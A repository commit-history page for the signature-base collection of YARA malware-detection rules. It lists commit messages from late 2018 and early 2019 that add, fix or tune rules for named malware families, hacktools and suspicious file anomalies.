valitydev/signature-base
14
0
Fork 0
mirror of https://github.com/valitydev/signature-base.git synced 2024-11-06 18:15:20 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
895 Commits 2 Branches 1 Tag 33 MiB
7bfd6e14da
Commit Graph

673 Commits

Author SHA1 Message Date
John Lambert
7bfd6e14da
Update gen_macro_ShellExecute_action.yar 2019-01-31 19:38:50 -08:00
Florian Roth
4dafd62d5e APT DNS Hijacking campaign AA19-024A 
https://www.us-cert.gov/ncas/alerts/AA19-024A
 2019-01-29 15:31:54 +01:00
Florian Roth
6332f7c6ca Kitty Fork Putty FP 2019-01-29 15:31:54 +01:00
Florian Roth
7564e6e8e6 False Positive Reduction 
https://github.com/Neo23x0/signature-base/issues/54
 2019-01-24 11:03:01 +01:00
Florian Roth
b5f6c82040 Suspicious RTF header anomaly 2019-01-20 17:36:32 +01:00
Florian Roth
e3bee33094 False Positive Reduction 2019-01-20 17:36:18 +01:00
Florian Roth
caef03b95b fix: moved lsadump rule from general rules to the ext vars file 2019-01-19 12:22:32 +01:00
Florian Roth
ccd0b61cfd bugfix: PowerShell_Susp_Parameter_Combo 2019-01-17 13:18:07 +01:00
Florian Roth
ca7f252dc0 False Positive Reduction 2019-01-17 13:12:39 +01:00
Florian Roth
c0b0167e7b
That's great 2019-01-16 19:29:40 +01:00
Florian Roth
e1262a718e
I'd adjust it like that 2019-01-16 19:27:29 +01:00
Jeff Beley
3fa7540094 Added rules for a tiny webshell and a go based htran variant 2019-01-16 10:58:25 -06:00
Florian Roth
32182ab8ff Nitol Malware 2019-01-14 11:20:18 +01:00
Florian Roth
6d0e6bc997
Update gen_bad_pdf.yar 2019-01-10 11:28:31 +01:00
Clément Notin
a61ab94eff
gen_bad_pdf.yar: fix detection of Metasploit generated files 2019-01-10 10:49:55 +01:00
John Lambert
0de78e6654
Create gen_macro_ShellExecute_action.yar 
Rule finds VBA macro samples that use the ShellExecute "evasion" method specified in the tweet mentioned in the rule.
 2019-01-08 12:22:19 -08:00
Florian Roth
4349f58d37 Score adjustments 2019-01-08 09:18:54 +01:00
Florian Roth
9a0e7a44fb Cryp RAT 2019-01-08 09:18:45 +01:00
Florian Roth
7216c088b0 JAVA class with VBS content 2019-01-07 13:28:06 +01:00
Florian Roth
6d9577a703 Putty anormal file sizes 2019-01-07 13:27:31 +01:00
Florian Roth
03f109c14e Improved script obfuscation rule 2019-01-03 11:04:14 +01:00
Florian Roth
9eec73061a APT28 Zebrocy Golang Loader by @VK_Intel 
https://www.vkremez.com/2018/12/lets-learn-progression-of-apt28sofacy.html
 2019-01-02 09:19:09 +01:00
Florian Roth
d26a5045d9 Ryuk Ransomware 2018-12-31 14:56:56 +01:00
Florian Roth
2fb2bd2481 fix: removed duplicate rule 2018-12-29 17:00:19 +01:00
Florian Roth
b6920c0d0c Moved NK miner to generic list 2018-12-29 09:31:57 +01:00
Florian Roth
82a91c8d6c Update on crypto coin miner 2018-12-29 09:31:14 +01:00
Florian Roth
819c4f2ac5 fix: missing "pe" import 2018-12-29 09:20:24 +01:00
Florian Roth
0b96d7131d APT10 rule update with imphash rule 2018-12-29 09:17:56 +01:00
Florian Roth
900796dcdf Hacktool NoPowerShell 2018-12-28 14:57:03 +01:00
Florian Roth
046b5736d0 YARA rule description cleanup 2018-12-28 12:38:31 +01:00
Florian Roth
cf85a7cd31 YARA rule svchosts 2018-12-22 09:12:34 +01:00
Florian Roth
72eaa194ae Area1 Phishing Diplomacy Rules 2018-12-19 19:17:51 +01:00
Florian Roth
f73324aa1a Minor adjustments in gen_malware_MacOS_plist_suspicious rule 2018-12-16 10:10:42 +01:00
John Lambert
bd8185482f
Detect suspicious MacOS launch agent config files 
plist files contain configuration for user-specific background jobs in OSX. Malware abuses this feature for persistence. Coin miners have been seen to use this feature as well.
 2018-12-14 13:55:31 -08:00
Florian Roth
13b238f39f Fixed character formatting to wide in SUSP_Scheduled_Task_BigSize 2018-12-14 08:58:10 +01:00
Florian Roth
1b959e2a3b False Positives on Exchange with SUSP_Scheduled_Task_BigSize 2018-12-14 08:55:48 +01:00
Florian Roth
e4dd8c610c Fixed some dates 2018-12-14 08:55:27 +01:00
Florian Roth
e118b0c92e Rule: Powershell Obfuscation 2018-12-13 14:25:01 +01:00
Florian Roth
826446a785 Low scoring rule: Anomaly - Linux UPX compressed binaries 2018-12-13 14:24:41 +01:00
Florian Roth
ab5ac55a1b New HawkEye keylogger rule 2018-12-12 09:24:12 +01:00
Florian Roth
a22874af46 Lazagne Password Dumper 2018-12-11 15:12:42 +01:00
Florian Roth
80a090685d False Positive Reduction and Cleanup 2018-12-11 15:08:39 +01:00
Florian Roth
9d38c8f4b3 Suspicious Scheduled Task BigSize 2018-12-07 08:20:44 +01:00
Florian Roth
2ed2af38f8 Suspicious Pirated Office 2007 2018-12-07 08:20:31 +01:00
Florian Roth
73bfc659da fix: bugfix in SSHDoor rule - missing "and" 2018-12-05 21:03:24 +01:00
Florian Roth
a2c2478527 Limited SSHDoor rule to ELF to avoid false positives 2018-12-05 21:00:25 +01:00
Florian Roth
63010d1954 Linux/SSHDoor - Triton related by ESET - modified version 
https://github.com/eset/malware-ioc/tree/master/sshdoor
 2018-12-05 20:58:02 +01:00
Florian Roth
0a3567621b fix: bugfix in generic_anomalies rule 2018-12-01 13:32:26 +01:00
Florian Roth
9291c8c9a1 fix: bugfix in general_anomalies.yar rule 2018-12-01 13:02:18 +01:00
Florian Roth
8cd247169a False Positive Reduction 2018-12-01 08:33:33 +01:00